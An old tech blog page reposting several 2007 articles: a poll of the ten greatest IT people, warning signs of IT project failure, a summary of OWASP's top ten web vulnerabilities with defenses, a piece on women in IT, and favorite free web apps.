Your Ad Here Visit new version of this Blog

Do developers only work in a Teamwork Environment?

Killer place to work

Everyone desires to have a BEST place to work where he/she will have more fun, more facilities as well as Productivity, loyalty, regularity etc.

GOOGLE is awarded with No.1 BEST PLACE TO WORK FOR 2007

Life at google

100 Best Companies to Work For 2007



Fun with Computer’s Life

Fun with Programmer’s Life

Do you know the effects of exceedingly attachment to Computer or use of Mouse?

Results sometimes have fun and sometimes cannot be as pleasurable as in video... :-D

Life of a Programmer

Life of a Programmer

  • How an irritated Programmer behave to the System?
  • Do you also behave like that if you are unable to get away yourself from such a disturbed problem?


Please don’t do that to your home PC


A Day in the life of a Programmer

A Day in the life of a Programmer:

Programmers know their daily activities,

  • How to tackle problems
  • How to overcome the frustration of intricate problems that come in daily life programming

(-: See your day ever passed like the buddy in VIDEO :-)




IT greats: Top 10 greatest IT people

IT greats: Top 10 greatest IT people

Author: Computer Weekly reporter

Posted: 00:00 27 Oct 2006

For every world-famous name with a world famous fortune, such as Bill Gates, Steve Jobs and Michael Dell, there are hundreds of other individuals who have moved the IT industry and its technology inexorably forward.

Fame and fortune has rarely been their immediate spur. A passion for changing the world through technology is the hallmark of the IT Greats. Sometimes they have changed technology, sometimes they have transformed the way technology is marketed or radically altered the way IT is perceived by society.

Some have been involved in great leaps forward, some have made incremental changes that have stood the test of time.

Whatever the case, our industry is truly one where we all stand on the shoulders of giants, and we are proud to pay tribute to some of them in the results of our IT Greats poll.

Top 10 greatest IT people
1. Steve Jobs

2. Tim Berners-Lee

3. Bill Gates

4. James Gosling

5. Linus Torvalds

6. Richard Stallman

7. Arthur C Clark

8. Ted Codd

9. Steve Shirley

10. Martha Lane Fox

1. Steve Jobs: innovator who enjoyed a second bite of the apple

Steve Jobs, the co-founder and chief executive of Apple Computer, topped the Computer Weekly 40th anniversary poll due to the devoted following he has generated through his pioneering work in personal computing and product design.

Jobs was born in 1955 in San Francisco, and during his high school years he showed his early enthusiasm for computing by attending after-school lectures at the Hewlett-Packard Company in Palo Alto, California. He met fellow Apple founder Steve Wozniak during a summer job at HP.

In the autumn of 1974, Jobs, who had dropped out of university after one term, began attending meetings of the Homebrew Computer Club with Steve Wozniak. He took a job as a technician at Atari, a manufacturer of popular video games.

At the age of 21 Jobs saw a computer that Wozniak had designed for his own use and convinced his friend to market the product.

Apple Computer was founded as a partnership on 1 April 1976. Though the initial plan was to sell just printed circuit boards, Jobs and Wozniak ended up creating a batch of completely assembled computers, and entered the personal computer business.

Their second machine, the Apple II, was introduced the following year and became a huge success, turning Apple into an important player in the nascent personal computer industry.

In 1983 Apple launched the Lisa, the first PC with a graphical user interface – an essential element in making computing accessible to the masses. It flopped because of its prohibitive price, but the next year Apple launched the distinct, lower priced Macintosh and it became the first commercially successful GUI machine.

Despite his success in founding Apple, Jobs left following a boardroom row in 1985. But his influence on the computer industry did not end there.

Jobs moved on to found Next Computer, then in 1986 he bought little known The Graphics Group from Lucasfilm, which achieved global dominance in animated feature films during the 1990s, after being renamed Pixar.

Much of Next’s technology had limited commercial success, but it laid the foundation for future computing developments. The company pioneered the object-oriented software development system, Ethernet port connectivity and collaborative software. It was the Next interface builder that allowed Tim Berners-Lee to develop the original world-wide web system at Cern.

Without Jobs, Apple had stumbled. Market share fell while it struggled to release new operating systems. Its answer was to buy Jobs’ company Next, together with its innovative operating system, and welcome back its charismatic former CEO.

On returning to Apple, Jobs drove the company ever deeper into the consumer electronics and computing market, launching the iMac and iPod.

Whether Jobs’ next creation changes the world like the Apple II, or turns out to bomb like the Apple Lisa, his place in computing history is guaranteed.

2. Tim Berners-Lee: father of the web and champion of IT freedom

Dotcoms, bloggers and Google all have one man to thank for their place in the 21st century world. In 1990,
Tim Berners-Lee made the imaginative leap to combine the internet with the hypertext concept, and the worldwide web was born.

Born in 1955 in London, Berners-Lee’s parents were both mathematicians who were employed together on the team that built the Manchester Mark I, one of the earliest computers.

After attending school in London, Berners-Lee went on to study physics at Queen’s College, Oxford, where he built a computer with a soldering iron, TTL gates, an M6800 processor and an old television. While at Oxford, he was caught hacking with a friend and was subsequently banned from using the university computer.
He worked at Plessey Telecommunications from 1976 as a programmer and in 1980 began working as an independent contractor at the European nuclear research centre Cern.

In December 1980, Berners-Lee proposed a project based on the concept of hypertext, to facilitate sharing and updating information among researchers. While there, he built a prototype system called Enquire.

He joined Cern on a full-time basis in 1984 as a fellow. In 1989, Cern was the largest internet node in Europe, and Berners-Lee saw an opportunity. “I just had to take the hypertext idea and connect it to the TCP and DNS ideas,” he said, and the worldwide web was born.

He wrote his initial proposal in March of 1989, and in 1990, with the help of Robert Cailliau, produced a revision which was accepted by his manager, Mike Sendall.

He used similar ideas to those underlying the Enquire system to create the worldwide web, for which he designed and built the first web browser and editor (called World-wide Web and developed on Nextstep) and the first web server called Hypertext Transfer Protocol Daemon (HTTPD).

The first website built was at http://info.cern.ch/ and was put online on 6 August 1991. The URL is still in use today. It provided an explanation of the worldwide web, how one could own a browser and how to set up a web server. It was also the world’s first web directory, since Berners-Lee maintained a list of other websites.

In 1994, Berners-Lee founded the World Wide Web Consortium (W3C) at the Massachusetts Institute of Technology. It comprised various companies willing to create standards and recommendations to improve the quality of the web.

Berners-Lee made his ideas available freely, with no patent and no royalties due. He is now the director of W3C, a senior researcher at MIT’s CSail, and professor of computer science at Southampton University.

3. Bill Gates: mixing maths and money to build microsoft

As joint founder of the world’s biggest software company, Microsoft, Bill Gates’s approach to technology and business was instrumental in making technology available to the masses.

Gates was born in Seattle, Washington in 1955 to a wealthy family: his father was a prominent lawyer and his mother served on the board of directors for First Interstate Bank and The United Way.

At school Gates excelled in mathematics and the sciences and by the age of 13 he was deeply engrossed in software programming.

With other school mates he began programming and bug fixing for the Computer Center Corporation, and in 1970 Gates formed a venture with fellow school student and Microsoft co-founder, Paul Allen, called Traf-O-Data, to make traffic counters using the Intel 8008 processor.

In 1973, Gates enrolled at Harvard University, where he met future business partner Steve Ballmer. Their first venture was to develop a version of the Basic programming language for the Altair 8800, one of the first microcomputers.

Soon afterwards Gates left Harvard to found “Micro-Soft”, which later became Microsoft Corporation, with Allen. Microsoft took off when Gates began licensing his MS-Dos operating systems to manufacturers of IBM PC clones. Its drive to global dominance continued with the development of Windows, its version of the graphical user interface, as an addition to its Dos command line.

By the early 1990s, Windows had driven other Dos-based GUIs like Gem and Geos out of the market. It performed a similar feat with the Office productivity suite.

Gates fought hard to establish Micro­soft’s dominant position in the software industry and has fought even harder to defend it. His ability to get Microsoft software pre-installed on most PCs shipped in the world made Microsoft the world’s largest software house and Gates one of the world’s richest men. It also meant Microsoft found itself on the wrong end of anti-trust legislation in both the US and Europe.

Gates stood down as chief executive of Microsoft in 2000 to focus on software development and on 16 June 2006, he announced that he would move to a part-time role with Microsoft in 2008 to focus on his philanthropic work.

Since 2000, Gates has given away about £15.5bn, a third of his wealth, to charity. Such is his fame in the world outside computing,fictional Gates characters have appeared in cartoons including the Simpsons, South Park and Family Guy.

4. James Gosling

Of your choice of the most influential people in IT, James Gosling is the true geek. Unlike Bill Gates and Steve Jobs, neither of whom finished college, Gosling completed a PhD in computer science and contributed to software innovation at a technical level.

Born in 1955 near Calgary, Canada, Gosling is best known as the father of the Java programming language, the first programme language designed with the internet in mind and which could adapt to highly distributed applications.

Gosling received a BSc in computer science from the University of Calgary in 1977, and while working towards his doctorate he created the original version of the Emacs text editor for Unix (Gosmacs). He also built a multi-processor version of Unix, as well as several compilers and mail systems before starting work in the industry.

In 1984, Gosling joined Sun Microsystems, where he is currently chief technology officer in the developer product group.

In the early 1990s, Gosling initiated and led a project code-named Green that eventually became Java. Green aimed to develop software that would run on a variety of computing devices without having to be customised for each one.

Although much of the technology developed as part of Green never saw the light of day, Gosling realised that some of the underlying principles they had created would be very useful in the internet age.

Sun formally launched Java in 1995. Gosling did the original design of Java and implemented its original compiler and virtual machine. For this achievement he was elected to the US National Academy of Engineering. He has also made major contributions to several other software systems, such as Newa and Gosling Emacs.

Although some critics say Java has not lived up to its initial "write-once-run-anywhere" claim, Gosling's success in the Computer Weekly polls is precisely because Java has allowed the creation of robust, reusable code which runs on devices as diverse at mobile phones, PCs and mainframes.

5. Linus Torvalds

As the creator of the Linux operating system, Linus Torvalds has been a driving force behind the whole open source movement, which represents not only an ever increasing challenge to proprietary software, but is also the inspiration for the industry to move to open standards.

Torvalds remains the ultimate authority on what new code is incorporated into the Linux kernel.

6. Richard Stallman

Richard Stallman is the founder of the GNU Project, an initiative to develop a complete Unix-like operating system which is free software. Stallman has written several popular tools, created the GNU licence and campaigns against software patents.

7. Arthur C Clarke

2001: A Space Odyssey writer Arthur C Clarke has consistently been ahead of his time in predicting how technology will change the world. Most notably, in 1945 he suggested that geostationary satellites would make ideal telecoms relays.

8. Ted Codd

Ted Codd created 12 rules on which every relational database is built - an essential ingredient for building business computer systems.

9. Steve Shirley

Steve Shirley was an early champion of women in IT. She founded the company now known as Xansa, pioneered new work practices and in doing so created new opportunities for women in technology.

10. Martha Lane Fox

With Brent Hoberman, Martha Lane Fox created Lastminute.com in 1998, and as "the face" of Lastminute raised the profile of e-commerce ever higher in the public consciousness.

Readers hail Dilbert the guru of corporate culture

According to Computer Weekly readers, Dilbert, which features every week on the back pages of the magazine, has more insight into corporate life and organisation than any number of highly paid management consultants could ever achieve.

Written and drawn by Scott Adams, Dilbert portrays corporate culture as a world of bureaucracy for its own sake, where employees' skills and efforts are not rewarded. Much of the humour emerges from the characters wrestling with the obviously ridiculous decisions and behaviour of management.

1955: a good year for computing

The top four people in our poll were all born in 1955, making it a very beneficial year for the world of computing.

It may have been a good year for computing, but 1955 was a sad year for science, as Albert Einstein died on 18 April.

It was also the year that the first McDonald's fast food franchise was opened: we'll leave you to make up you own mind about that one.

Your big names

Outside the main choices for greatest hardware, the most popular readers' suggestions were:

1. Ken Olsen, founder of Dec, who invented the minicomputer

2. Clive Sinclair, home computer visionary

3. Vint Cerf, one of the internet's founding fathers

4. Bill Joy, co-founder of Sun Microsystems

5. Larry Ellison, founder of Oracle

6. Steve Wozniak, Apple co-founder

7. Dennis Ritchie, inventor of the C programming language

8. Donald Davies, co-inventor of packet switching

9. Ken Thompson, co-creator of Unix

10. Grace Hopper, Cobol pioneer

10 Warning Signs of Project Failure

10 Warning Signs of Project Failure
By
Allen Bernard
October 18, 2007

Unless you are in a mature industry such as banking or insurance, where information is the life-blood of what you do, chances are you will be familiar with at least some of these 10 project management failings put together by Robert Francis Group analyst Mimi Ho.

"One, they're right on the button and two, if you take a look at the large majority of them, it all has to do with project planning and early stages of analysis that companies like to jump over," said Jeff Monteforte, owner of Exential, an independent project management consultancy in Cleveland, Ohio.

In other words, when IT projects fail it rarely is a result of the technology. At its core, project management is all about people.

"Even in some of our clients, some of them are doing very well … and others are just starting where they don't even have executive support and they get the executives saying 'Just start the project I don't care what you do'," said Ms. Ho. "And projects fail … and they're like 'It's IT's fault.'"

The Top 3 problems Monteforte, a 20-year veteran of the project management business, encounters most often are: lack of executive support; changes to project scope and the lack of change management; and failure to establish user expectations which leads all too often to unrealistic deadlines.

The Top 3 project killers he encounters are: lack of executive support; lack of pre-project planning; and insufficient people (not monetary) resources allocated to get the project done.

Ms. Ho also sees the same problems—especially lack of executive support—as Monteforte but adds poorly defined project requirements to his lists.

"You need to speak with stakeholders directly because the bill changes or they visualize the project being a certain way but when it's communicated the project could be different," said Ms. Ho.

According to RFG and Ms. Ho, what follows, in no particular order, are the 10 most common pitfalls to successful project completion:

Undefined or poorly defined project requirements. - Project managers should collaborate directly with key project stakeholders to define specific detailed project requirements and deliverables. Defining specific project requirements is necessary to maintain alignment of project tasks to desired business outputs, as well as to ensure that projects have clear and specific project objectives established.

While this step may seem obvious, many companies will skip this stage and go right to solutions to jump start a project. Business and/or IT executives assume the requirements (such as controls, dashboards, data, dependencies, functionality, integration, metrics, outputs, and workflow) are met without performing any confirming analysis.

These projects tend to fail and the companies usually encounter over spending, project restarts, rework, and/or unmet expectations.

Lack of project planning. - Once the requirements are known, then conducting thorough, upfront project scope planning is an essential next step to help project managers and stakeholders accurately and clearly define project scope.

It is important for people to understand that there is more than one way to achieve the requirements and that scope and cost vary by approach. Project scope management is therefore necessary to develop reasonable project estimates, enhance the management of customer and stakeholder expectations, and mitigate project risks such as cost overruns and schedule delays.

Project managers should establish and standardize a scope management process to develop concise project scope statements and credible budget and schedule estimates.

Lack of or poorly developed budget forecast. - Thorough research and preparation is necessary to develop a reasonable budget estimate. Many companies will skip this step or just do a very rudimentary estimate due to the amount of work needed to complete the task.

Some companies that do not maintain internal archives of project costs turn to external consultancies to acquire external spending/budget information on companies that have completed similar projects in a similar market.

Using the estimated budget, project managers should collaborate with stakeholders to help further refine the project scope and final deliverables. Project managers should use their initial budget to base actual spending plans as well as to proactively track spending and respond quickly to potential issues to prevent shortfalls in the budget.

Lack of stakeholder involvement. - Project managers should ensure that primary project stakeholders are involved with the project from the beginning and throughout the entire project. This is crucial to ensure that visions are properly communicated, defined, and verified.

It is very common for project efforts to be delegated to staff that do not have sufficient knowledge or understanding of the desired effort. As a result, projects are defined incorrectly and the projects delivered do not meet the expectations of key stakeholders.

Lack of executive support. - An IT project can be highly political and may end up involving an excessive number of unnecessary or incorrect participants. IT executives should seek ongoing senior management endorsement and enforcement of the planning process to keep the effort on track and to minimize pushback from line of business (LOB) managers.

Support from senior management and staff involvement are both needed to drive and keep the effort focused and moving. Ownership of the project must be shared to satisfy the demands of user management. IT executives must convey this message to senior management to retain involvement and participation.

Frequent or large changes to project scope. - Scope changes can significantly impact the cost, schedule, risks and quality of the entire effort. Project managers should watch out for early and frequent changes to the project scope.

While scope is defined early in the planning and estimation phases, there are valid reasons for change. For example, a stakeholder may acquire additional insight into a problem during the course of the project or external market conditions and/or government regulations can drive requests that extend beyond the initial project scope. However, changes to project scope can also occur as a result of developing a poor initial scope document.

Project managers must ensure that adequate time is spent on defining and refining the work effort directly with key stakeholders.
Lack of change management process. - Project changes will occur. However, uncontrolled changes and insufficient change management processes will increase the probability of project failure. A formal and structured change management process is necessary to ensure effects of any changed requirements are properly analyzed, prioritized, and balanced according to the project's budget, schedule, and scope.

Project managers should consistently and publicly take a phased approach to projects, so that users understand that not all changes must be completed for the current release. This will help acceptance of trading off specific desired changes for faster availability of greater functionality. This will also help reduce the impact of change onto the project, and allow for cost and time containment.

Failure to establish appropriate client/user expectations. Disputes often occur as a result of mismatched expectations. Missed project targets will cause delays, rework, and additional project spending. Setting user expectations is necessary to establish a baseline of what and what not to expect from the final deliverable.

Project managers should work with key stakeholders in establishing and prioritizing project requirements as well as reviewing budgets and schedules. Additionally, all people involved in the project effort should have periodic joint sessions, to ensure the same communications on project expectations are received by everyone.

This process helps keep users involved and abreast of the project's status, as well as minimizing the potential for misunderstanding of project expectations between stakeholders.

Unrealistic deadlines. - Stakeholders want their projects completed now. In some harsh environments, they may question IT's commitment and effort. IT executives and project managers must work with stakeholders to help them understand what is possible with the level of incumbent IT resources.

Project managers should collaborate with key stakeholders in defining reasonable project schedules and deadlines to ensure that business conditions and requirements are met and better manage expectation levels.

Project managers will need to ensure that project cost, scope, and time are optimally balanced to achieve the desired deliverables and the desired time. Effective planning and monitoring are necessary to help develop a strong start for the project. However, project managers must remain aware and anticipate change as re-planning is necessary throughout the project.

Insufficient resources. - Required resources are often underestimated and scheduled inaccurately. Companies often encounter problems with resource allocation, as many companies to do not spend sufficient time on resource scheduling and proper management.

In fact, it is very common for companies to overestimate the on-boarding of staff to a project, which immediately causes the project to be late and in trouble, impairing IT's image with LOB managers and executives. In addition, resources are often utilized ineffectively, especially when individuals are required to support multiple projects concurrently. Insufficient resource supply will cause delays and impact overlapping projects.

Project managers should plan according to the established project schedule estimates and work with concurrent project schedules to help ensure that resources are properly scheduled.

Summary

All companies have experienced projects that have gone over budget, schedule, and scope. However, project managers can learn from past historical data, experiences of peer companies, and project management organizations.

Taking a proactive approach to preventing project failure is a necessary first step to overcoming repeated failure. Sufficient research and planning as well as patience in establishing necessary project processes are essential to developing a solid project management foundation.

Project managers must ensure that the initial project plan is strong enough to sustain the project throughout its life cycle. A project plan should be assessed on the project's alignment with business strategies, budget, the cost/benefit analysis, relevance, resource requirements, and scope to help determine its value contribution to the enterprise.


The top 10 reasons Web sites get hacked

Experts say the people who actually build Web applications aren't paying much attention to security; a non-profit group is trying to solve that

By Jon Brodkin, Network World
October 05, 2007

Web security is at the top of customers' minds after many well-publicized personal data breaches, but the people who actually build Web applications aren't paying much attention to security, experts say.

"They're totally ignoring it," says IT consultant Joel Snyder. "When you go to your Web site design team, what you're looking for is people who are creative and able to build these interesting Web sites... That's No. 1, and No. 9 on the list would be that it's a secure Web site."

The biggest problem is designers aren't building walls within Web applications to partition and validate data moving between parts of the system, he says.

Security is usually something that's considered after a site is built rather than before it is designed, agrees Khalid Kark, senior analyst at Forrester.

"I'd say the majority of Web sites are hackable," Kark says. "The crux of the problem is security isn't thought of at the time of creating the application."

That's a big problem, and it's one the nonprofit Open Web Application Security Project (OWASP) is trying to solve. An OWASP report called "The Ten Most Critical Web Application Security Vulnerabilities" was issued this year to raise awareness about the biggest security challenges facing Web developers.

The first version of the list was released in 2004, but OWASP Chairman Jeff Williams says Web security has barely improved. New technologies such as AJAX and Rich Internet Applications that make Web sites look better also create more attack surfaces, he says. Convincing businesses their Web sites are insecure is no easy task, though.

"It's frustrating to me, because these flaws are so easy to find and so easy to exploit," says Williams, who is also CEO and co-founder of Aspect Security. "It's like missing a wall on a house."

Here is a summary of OWASP's top 10 Web vulnerabilities, including a description of each problem, real-world examples and how to fix the flaws.

1. Cross site scripting (XSS)

The problem: The "most prevalent and pernicious" Web application security vulnerability, XSS flaws happen when an application sends user data to a Web browser without first validating or encoding the content. This lets hackers execute malicious scripts in a browser, letting them hijack user sessions, deface Web sites, insert hostile content and conduct phishing and malware attacks.

Attacks are usually executed with JavaScript, letting hackers manipulate any aspect of a page. In a worst-case scenario, a hacker could steal information and impersonate a user on a bank's Web site, according to Snyder.

Real-world example: PayPal was targeted last year when attackers redirected PayPal visitors to a page warning users their accounts had been compromised. Victims were redirected to a phishing site and prompted to enter PayPal login information, Social Security numbers and credit card details. PayPal said it closed the vulnerability in June 2006.

How to protect users: Use a whitelist to validate all incoming data, which rejects any data that's not specified on the whitelist as being good. This approach is the opposite of blacklisting, which rejects only inputs known to be bad.

Additionally, use appropriate encoding of all output data. "Validation allows the detection of attacks, and encoding prevents any successful script injection from running in the browser," OWASP says.

2. Injection flaws

The problem: When user-supplied data is sent to interpreters as part of a command or query, hackers trick the interpreter -- which interprets text-based commands -- into executing unintended commands. "Injection flaws allow attackers to create, read, update, or delete any arbitrary data available to the application," OWASP writes. "In the worst-case scenario, these flaws allow an attacker to completely compromise the application and the underlying systems, even bypassing deeply nested firewalled environments."

Real-world example: Russian hackers broke into a Rhode Island government Web site to steal credit card data in January 2006. Hackers claimed the SQL injection attack stole 53,000 credit card numbers, while the hosting service provider claims it was only 4,113.

How to protect users: Avoid using interpreters if possible. "If you must invoke an interpreter, the key method to avoid injections is the use of safe APIs, such as strongly typed parameterized queries and object relational mapping libraries," OWASP writes.

3. Malicious file execution

The problem: Hackers can perform remote code execution, remote installation of rootkits, or completely compromise a system. Any type of Web application is vulnerable if it accepts filenames or files from users. The vulnerability may be most common with PHP, a widely used scripting language for Web development.

Real-world example: A teenage programmer discovered in 2002 that Guess.com was vulnerable to attacks that could steal more than 200,000 customer records from the Guess database, including names, credit card numbers and expiration dates. Guess agreed to upgrade its information security the next year after being investigated by the Federal Trade Commission.

How to protect users: Don't use input supplied by users in any filename for server-based resources, such as images and script inclusions. Set firewall rules to prevent new connections to external Web sites and internal systems.

4. Insecure direct object reference

The problem: Attackers manipulate direct object references to gain unauthorized access to other objects. It happens when URLs or form parameters contain references to objects such as files, directories, database records or keys.

Banking Web sites commonly use a customer account number as the primary key, and may expose account numbers in the Web interface.

"References to database keys are frequently exposed," OWASP writes. "An attacker can attack these parameters simply by guessing or searching for another valid key. Often, these are sequential in nature."

Real-world example: An Australian Taxation Office site was hacked in 2000 by a user who changed a tax ID present in a URL to access details on 17,000 companies. The hacker e-mailed the 17,000 businesses to notify them of the security breach.

How to protect users: Use an index, indirect reference map or another indirect method to avoid exposure of direct object references. If you can't avoid direct references, authorize Web site visitors before using them.

5. Cross site request forgery

The problem: "Simple and devastating," this attack takes control of victim's browser when it is logged onto a Web site, and sends malicious requests to the Web application. Web sites are extremely vulnerable, partly because they tend to authorize requests based on session cookies or "remember me" functionality. Banks are potential targets.

"Ninety-nine percent of the applications on the Internet are susceptible to cross site request forgery," Williams says. "Has there been an actual exploit where someone's lost money? Probably the banks don't even know. To the bank, all it looks like is a legitimate transaction from a logged-in user."

Real-world example: A hacker known as Samy gained more than a million "friends" on MySpace.com with a worm in late 2005, automatically including the message "Samy is my hero" in thousands of MySpace pages. The attack itself may not have been that harmful, but it was said to demonstrate the power of combining cross site scripting with cross site request forgery. Another example that came to light one year ago exposed a Google vulnerability allowing outside sites to change a Google user's language preferences.

How to protect users: Don't rely on credentials or tokens automatically submitted by browsers. "The only solution is to use a custom token that the browser will not 'remember,'" OWASP writes.

6. Information leakage and improper error handling

The problem: Error messages that applications generate and display to users are useful to hackers when they violate privacy or unintentionally leak information about the program's configuration and internal workings.

"Web applications will often leak information about their internal state through detailed or debug error messages. Often, this information can be leveraged to launch or even automate more powerful attacks," OWASP says.

Real-world example: Information leakage goes well beyond error handling, applying also to breaches occurring when confidential data is left in plain sight. The ChoicePoint debacle in early 2005 thus falls somewhere in this category. The records of 163,000 consumers were compromised after criminals pretending to be legitimate ChoicePoint customers sought details about individuals listed in the company's database of personal information. ChoicePoint subsequently limited its sales of information products containing sensitive data.

How to protect users: Use a testing tool such as OWASP'S WebScarab Project to see what errors your application generates. "Applications that have not been tested in this way will almost certainly generate unexpected error output," OWASP writes.

Another tip: disable or limit detailed error handling, and don't display debug information to users.

7. Broken authentication and session management

The problem: User and administrative accounts can be hijacked when applications fail to protect credentials and session tokens from beginning to end. Watch out for privacy violations and the undermining of authorization and accountability controls.

"Flaws in the main authentication mechanism are not uncommon, but weaknesses are more often introduced through ancillary authentication functions such as logout, password management, timeouts, remember me, secret question and account update," OWASP writes.

Real-world example: Microsoft had to eliminate a vulnerability in Hotmail that could have let malicious JavaScript programmers steal user passwords in 2002. Revealed by a networking products reseller, the flaw was vulnerable to e-mails containing Trojans that altered the Hotmail user interface, forcing users to repeatedly reenter their passwords and unwittingly send them to hackers.

How to protect users: Communication and credential storage has to be secure. The SSL protocol for transmitting private documents should be the only option for authenticated parts of the application, and credentials should be stored in hashed or encrypted form.

Another tip: get rid of custom cookies used for authentication or session management.

8. Insecure cryptographic storage

The problem: Many Web developers fail to encrypt sensitive data in storage, even though cryptography is a key part of most Web applications. Even when encryption is present, it's often poorly designed, using inappropriate ciphers.

"These flaws can lead to disclosure of sensitive data and compliance violations," OWASP writes.

Real-world example: The TJX data breach that exposed 45.7 million credit and debit card numbers. A Canadian government investigation faulted TJX for failing to upgrade its data encryption system before it was targeted by electronic eavesdropping starting in July 2005.

Furthermore, generate keys offline, and never transmit private keys over insecure channels.

It's pretty common to store credit card numbers these days, but with a Payment Card Industry Data Security Standard https://www.pcisecuritystandards.org/ compliance deadline coming next year, OWASP says it's easier to stop storing the numbers altogether.

9. Insecure communications

The problem: Similar to No. 8, this is a failure to encrypt network traffic when it's necessary to protect sensitive communications. Attackers can access unprotected conversations, including transmissions of credentials and sensitive information. For this reason, PCI standards require encryption of credit card information transmitted over the Internet.

Real-world example: TJX again. Investigators believe hackers used a telescope-shaped antenna and laptop computer to steal data exchanged wirelessly between portable price-checking devices, cash registers and store computers, the Wall Street Journal reported.

"The $17.4-billion retailer's wireless network had less security than many people have on their home networks," the Journal wrote. TJX was using the WEP encoding system, rather than the more robust WPA.

How to protect users: Use SSL on any authenticated connection or during the transmission of sensitive data, such as user credentials, credit card details, health records and other private information. SSL or a similar encryption protocol should also be applied to client, partner, staff and administrative access to online systems. Use transport layer security or protocol level encryption to protect communications between parts of your infrastructure, such as Web servers and database systems.

10. Failure to restrict URL access

The problem: Some Web pages are supposed to be restricted to a small subset of privileged users, such as administrators. Yet often there's no real protection of these pages, and hackers can find the URLs by making educated guesses. Say a URL refers to an ID number such as "123456." A hacker might say 'I wonder what's in 123457?' Williams says.

The attacks targeting this vulnerability are called forced browsing, "which encompasses guessing links and brute force techniques to find unprotected pages," OWASP says.

Real-world example: A hole on the Macworld Conference & Expo Web site this year let users get "Platinum" passes worth nearly $1,700 and special access to a Steve Jobs keynote speech, all for free. The flaw was code that evaluated privileges on the client but not on the server, letting people grab free passes via JavaScript on the browser, rather than the server.

How to protect users: Don't assume users will be unaware of hidden URLs. All URLs and business functions should be protected by an effective access control mechanism that verifies the user's role and privileges. "Make sure this is done ... every step of the way, not just once towards the beginning of any multistep process,' OWASP advises.



U.S. faces competitive disadvantage from lack of women in IT

In both academic and business settings, women in high-tech fields lag far behind their male counterparts in numbers and clout

Discrimination against women and minorities is putting the U.S. at a disadvantage in technology innovation, according to the chancellor of the University of California at Berkeley.

Robert Birgeneau said of the top 50 university computer science department jobs in the U.S., not one is held by a woman of color. "How embarrassing," he said. "It's an astounding waste of talent in an increasingly competitive world."

Birgeneau was the keynote speaker at a workshop on women in technology as part of the Emerging Technologies Conference being held at MIT this week.

He said that while the number of women and men enrolling in undergraduate and post graduate technology programs has evened out somewhat, women are far behind their male counterparts when it comes to academic positions.

Birgeneau cited a study released last fall by The National Academies titled "Beyond Bias and Barriers: Fulfilling the Potential of Women in Academic Science and Engineering." The study said that at the top research institutions, only 15.4 percent of the full professors in the social and behavioral sciences and 14.8 percent in the life sciences are women, "and these are the only fields in science and engineering where the proportion of women reaches into the double digits."

The study also showed that women will likely face discrimination in every field of science and engineering. "We're at a drastic disadvantage in the United States, which is outsourcing to other countries like India and China, who are working madly to compete with us and who are investing deeply in education," he said.

Karen Vogel, founder of The Women's Congress, a women's business-to-business conference, said one factor contributing to the lack of advancement for women in technology jobs and faculty positions is that women often don't support other women when it comes to workplace advancement. Not everyone agreed.

Ilene Lang, president of Catalyst, a New York-based nonprofit corporate research and advisory organization, said during a conference session on workplace culture that preliminary data from an online survey of U.S.-based corporate women found barriers to advancement mostly include a lack of role models, too few corporate leaders who would champion women, and little access to business networks that could plug them into corporate decision-makers.

The survey included two groups of women: Those working in nontechnical roles in high-tech companies and those working in technology positions in companies other than high-tech.

Lang said that the same barriers come up year after year in Catalyst's surveys. "One of the key problems women raise is that they do not get direct feedback on how they can improve. Feedback is always indirect and dances around the edges," she said.

She said there weren't major differences in the results between the two groups of women that made up the 471 respondents in the survey, "except women in technology roles said they intended to stay in their roles longer." The detailed survey results are due out some time next spring, Lang said.

Some women at the conference spoke about their personal experiences with discrimination, including a lack of women in high-level managerial and executive positions.

Ying Li, general manager of applied research and data mining at Microsoft, said during a panel discussion that there are few women who are senior technical leaders at her company.

Claudia Bauzer Medeiros, who was the first woman professor of computer science at the University of Campinas in Sao Paulo, Brazil, said she was able to advance in her career because she never thought of herself as a woman when it came to her job.

"If you start thinking of yourself as a minority, then you start getting a complex about it," she said.

By Lucas Mearian, Computerworld, IDG News Service

Five free Web apps we can't live without

September 27, 2007 (Computerworld) The current explosion of AJAX-powered Web sites has helped spawn countless next-generation Web apps offering everything from simple to-do lists to complex project management, not to mention the ability to share all kinds of things -- documents, calendar listings, photos, video and more.

But with so many sites out there and new ones cropping up almost daily, who's got time to try them all? Playing with dozens of Web apps to find ones you like can sort of defeat the purpose of many of these services: to boost your productivity.

Fortunately for you, we've already done a lot of this work. In the collaborative Web 2.0 spirit, we're sharing some of the favorite tools we use here at Computerworld. Even with their occasional flaws, we just can't stop using them.

From a simple to-do list to a robust drag-and-drop database builder, here are the ones we've found to be borderline addictive. (But we know we might have missed some, and hope you'll post your favorites -- with URLs -- in the comments area below.)



Web apps we can't live without:

Honorable mention

The A-list

Ta-da List

Any application has to balance the urge to offer lots of functionality with the need for an easy-to-use interface. But that's especially true for Web-based apps, where software bloat can be especially annoying because of slow connections and server wait times, and where users expect to point and click without having to read a 100-page manual first.

You'd be hard pressed to find a more streamlined, simple service than Ta-da List, which bills itself as "the Web's easiest to-do list tool." After opening an account, click "create a new list," name it, type in a task and click "add this item." Add more items by typing them in. Order the items by clicking on "reorder" and dragging items up or down.

Done rearranging? Click "I'm done reordering." When a task is completed, click the box next to it to move it down to the bottom. Edit or delete items (or the list itself) by selecting the edit link.

That's pretty much it. There are no categories, no tags, no priority numbers. I typically use it when I've got a couple of different things in the works that I want to make sure I remember. It's simple, elegant and very quick -- easy enough to replace jotting down a list on a piece of paper, but with a cool AJAX interface.

And unlike a paper list, my Ta-da list is available anywhere I can get online; I can't misplace it. I can also share it with others, either for viewing only or as a group collaborative list. While there are Google ads on the site, they're fairly innocuous and don't feel intrusive while I'm using my list.

Ta-da List was created by 37signals, the company best known for the Basecamp project management service that spawned David Heinemeier Hansson's open-source Ruby on Rails project. Hansson is a damant about keeping all his software lean, and nowhere is that more true than Ta-da List. project. Hansson is

If you must have more functionality in a to-do list, our sister site PCWorld.com recommends RememberTheMilk as a reinvented to-do list "in a snazzy interface that lets you make lists in configurable categories, all laid out on the front page as tabs." I agree that "adding to-dos is easy, though adding deadlines, notes and time estimates is unintuitive." Overall, RememberTheMilk seems like a bit too much work for what I'd get out of it, but for those who place a higher value on functionality than on elegance and simplicity, it's worth a look.

PBwiki

Besides giving us the Web's most famous encyclopedia, wikis offer a handy tool for many other types of informal group collaboration. A lot of open-source projects use wikis to share technical information with their users as well as among developers. While there are plenty of free wiki software packages you can download and install, in-house installation also means in-house update, patching and support.

